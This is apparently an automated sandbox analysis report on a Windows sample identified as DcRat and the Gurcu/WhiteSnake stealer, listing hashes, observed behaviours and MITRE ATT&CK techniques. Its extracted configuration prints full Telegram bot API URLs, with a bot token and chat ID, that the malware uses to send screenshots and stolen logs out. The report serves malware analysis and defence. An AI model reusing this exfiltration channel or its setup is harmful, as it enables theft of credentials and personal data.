General
-
Target
1.exe
-
Size
2.5MB
-
Sample
241115-27ed2stlhv
-
MD5
a13b59f33063b970d7adbe2a23fb5a81
-
SHA1
7a8f1204af663a38f87816c528e27137f310ae42
-
SHA256
9700e6f8ed338b7ebf337feef5a215a65d061a709a9067218d5ae73093ecb946
-
SHA512
6affe7c79c186e4d466c2f975987af39452d9991453d394efdf93af67c5d8e367ab867625d17ecdb2778c5962c40eea9a207e15c48f9346c58d875b86ce7459f
-
SSDEEP
49152:qbA3q2mzyt2DixLb4I5KKnK5zgdlKWkyT:qbrtzyoWFbvKKnK5Anks
Malware Config
Extracted
gurcu
https://api.telegram.org/bot7606992605:AAHdyli6CX1hNl7JUoS2-auLJ7WvyqQjHD8/sendPhoto?chat_id=7606992605&caption=%E2%9D%95%20User%20connected%20%E2%9D%95%0A%E2%80%A2%20ID%3A%20c325be7df51e043c04c118ef2bb738d43e08ff03%0A%E2%80%A2%20Comment%3A%20%D1%8E%D1%82%D1%83%D0%B1%0A%0A%E2%80%A2%20User%20Name%3A%20Admin%0A%E2%80%A2%20PC%20Name%3A%20ZTSLLRFH%0A%E2%80%A2%20OS%20Info%3A%20Windows%2010%20Pro%0A%0A%E2%80%A2%20IP%3A%20181.215.176.83%0A%E2%80%A2%20GEO%3A%20GB%20%2F%20London%0A%0A%E2%80%A2%20Working%20Directory%3A%20C%3A%5Cbrowserperf%5Csysmon.ex
https://api.telegram.org/bot7606992605:AAHdyli6CX1hNl7JUoS2-auLJ7WvyqQjHD8/sendDocument?chat_id=7606992605&caption=%F0%9F%93%8E%20Log%20collected%20%F0%9F%93%8E%0A%E2%80%A2%20ID%3A%20c325be7df51e043c04c118ef2bb738d43e08ff03%0A%0A%E2%80%A2%20Scanned%20Directories%3A%200%0A%E2%80%A2%20Elapsed%20Time%3A%2000%3A00%3A38.392558
https://api.telegram.org/bot7606992605:AAHdyli6CX1hNl7JUoS2-auLJ7WvyqQjHD8/sendDocument?chat_id=7606992605&caption=%F0%9F%93%8E%20Log%20collected%20%F0%9F%93%8E%0A%E2%80%A2%20ID%3A%20c325be7df51e043c04c118ef2bb738d43e08ff03%0A%0A%E2%80%A2%20Scanned%20Directories%3A%200%0A%E2%80%A2%20Elapsed%20Time%3A%2000%3A00%3A11.283864
Targets
-
-
Target
1.exe
-
Size
2.5MB
-
MD5
a13b59f33063b970d7adbe2a23fb5a81
-
SHA1
7a8f1204af663a38f87816c528e27137f310ae42
-
SHA256
9700e6f8ed338b7ebf337feef5a215a65d061a709a9067218d5ae73093ecb946
-
SHA512
6affe7c79c186e4d466c2f975987af39452d9991453d394efdf93af67c5d8e367ab867625d17ecdb2778c5962c40eea9a207e15c48f9346c58d875b86ce7459f
-
SSDEEP
49152:qbA3q2mzyt2DixLb4I5KKnK5zgdlKWkyT:qbrtzyoWFbvKKnK5Anks
Score10/10-
DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
-
Dcrat family
-
Gurcu family
-
Gurcu, WhiteSnake
Gurcu is a malware stealer written in C#.
-
Modifies WinLogon for persistence
-
Process spawned unexpected child process
This typically indicates the parent process was compromised via an exploit or macro.
-
UAC bypass
-
DCRat payload
Detects payload of DCRat, commonly dropped by NSIS installers.
-
Disables Task Manager via registry modification
-
Drops file in Drivers directory
-
Checks computer location settings
Looks up country code configured in the registry, likely geofence.
-
Executes dropped EXE
-
Loads dropped DLL
-
Reads user/profile data of web browsers
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application
-
Checks whether UAC is enabled
-
Looks up external IP address via web service
Uses a legitimate IP lookup service to find the infected system's external IP.
-
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
1Winlogon Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
1Winlogon Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
1Disable or Modify Tools
1Modify Registry
6Subvert Trust Controls
1Install Root Certificate
1Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1